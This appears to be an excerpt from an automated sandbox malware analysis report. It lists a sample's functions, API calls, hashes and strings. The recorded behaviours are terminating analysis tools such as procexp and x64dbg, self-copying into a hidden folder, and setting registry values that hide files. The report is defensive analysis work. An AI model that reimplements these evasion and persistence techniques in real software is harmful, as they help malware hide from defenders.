                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430AC), ref: 00007FF6EC843B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843B44: RegSetValueExW.ADVAPI32 ref: 00007FF6EC843BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843B44: RegCloseKey.ADVAPI32 ref: 00007FF6EC843BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF6EC843BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6EC843DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: Process32FirstW.KERNEL32 ref: 00007FF6EC843E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: CloseHandle.KERNEL32 ref: 00007FF6EC843E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: wcscmp.MSVCRT ref: 00007FF6EC843E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: OpenProcess.KERNEL32 ref: 00007FF6EC843E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: TerminateProcess.KERNEL32 ref: 00007FF6EC843E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: CloseHandle.KERNEL32 ref: 00007FF6EC843E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: Process32NextW.KERNEL32 ref: 00007FF6EC843EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843DE4: CloseHandle.KERNEL32 ref: 00007FF6EC843EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843974: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6EC843ACC), ref: 00007FF6EC8439A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF6EC843156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction ID: 6b0ebc540b3156adce6492b9d0cbf3a30c708639cef518f8d6c4a5d7fe42c800
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF215B26E1894291E600E764DA527BB6F69BF60751FA00132D41DC23E6DE6FE50BC60B
                                                                                                                                                                                                                        Function 00007FF6EC843884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EC843744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetVolumeInformationW.KERNEL32 ref: 00007FF6EC8437C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: wsprintfW.USER32 ref: 00007FF6EC843862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC84392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction ID: fa1d5c75b6a33d7230a42eceefe3ee46f80c138256ee3a2afe0b93ac1ca99549
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43115132628A8285DB609F25F96476B6766FBC4744F405031DB8EC3A29DF3ED00ACB49
                                                                                                                                                                                                                        Function 00007FF6EC842DFC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction ID: b39702e75fd36b9c2263cdb1b471e417d74f117e2548ae2b6a6f943bdd93aa36
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB01A93790CB02C1E720AB11E95432E6B79FB98B99F440531D98EC3674CF3ED586C60A
                                                                                                                                                                                                                        Function 00007FF6EC843DE4 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: ebfeed4d3384ef7099cb54dbb821328ea9847a40211f1585ae81f6e4ddcf9c74
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED212132A0CA8681E770DB11E94836BA765FFD4B54F104235C69EC3AA8DF3ED446DB05
                                                                                                                                                                                                                        Function 00007FF6EC842E9C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: 4aff9259c100a7cb863fd1b93bd47cd8fa57a8109d137b68aa386825b9889637
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E301C83391CA42C2E730AB21E95432F6B75FBD9B49F400135E98EC2664CE3ED546C606
                                                                                                                                                                                                                        Function 00007FF6EC843CA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: 19f151abe88e643f87487cd836c7ae2df0056ebcdcddea59f3ea43e1401e9b5a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1931F27661CBC086DB709B19E4883ABB7A4FB98B41F000225DA8EC3B68DF3DD141CB04
                                                                                                                                                                                                                        Function 00007FF6EC843A34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EC843744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetVolumeInformationW.KERNEL32 ref: 00007FF6EC8437C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: wsprintfW.USER32 ref: 00007FF6EC843862
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC84392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF6EC843A79
                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF6EC843A84
                                                                                                                                                                                                                        • CopyFileW.KERNEL32 ref: 00007FF6EC843A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF6EC843AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: 163988942e6ae4ff26b83112ee0362cfd600fbc072332237c5b9d851307db1dc
                                                                                                                                                                                                                        • Instruction ID: 09998a82d25ca1dfe1525bc6fdb06fb655d3362cb0c57c64311d09c0af615057
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 163988942e6ae4ff26b83112ee0362cfd600fbc072332237c5b9d851307db1dc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86019663B1868292EB60DB24E9543AB5764FB94744F905032D34DC36A5EF3ED20BCB09
                                                                                                                                                                                                                        Function 00007FF6EC843B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction ID: 77f3c636ec6049fd07ecf85b09ff21fa6d0069b906ae5898815a745fc54fe85a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F01E976618B808AD7509B14E84471BBBA4F789794F501225EBCD83B68DF7DC145CF05
                                                                                                                                                                                                                        Function 00007FF6EC8413C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 097c750978b034a87c946fdcf66dbd7de47845eee35a68986c5f60c2a5ea295e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1601EC33A0C64686E6308B50F54432B6BA9FB84749F904136E68E82A94DF7DD54ACB49
                                                                                                                                                                                                                        Function 00007FF6EC843FC4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: 31e2b2ee9792e853667c36042b3d491187971c5d777d9fa4094aca87b20a0ba0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45112A32A0CA8281E7B0DB10E58836BABA5FBC4795F004235CAADC3698DF3ED415DB05
                                                                                                                                                                                                                        Function 00007FF6EC843704 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: a4484b946f95f7e8d50750ce707f0d8d0eb400c8f318b26cae5e8401d4c93a1f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9831F52661C6C186DB20DB64E5983ABB7A4FB94704F500136E68DC7A58EF7EC909CB05
                                                                                                                                                                                                                        Function 00007FF6EC843974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
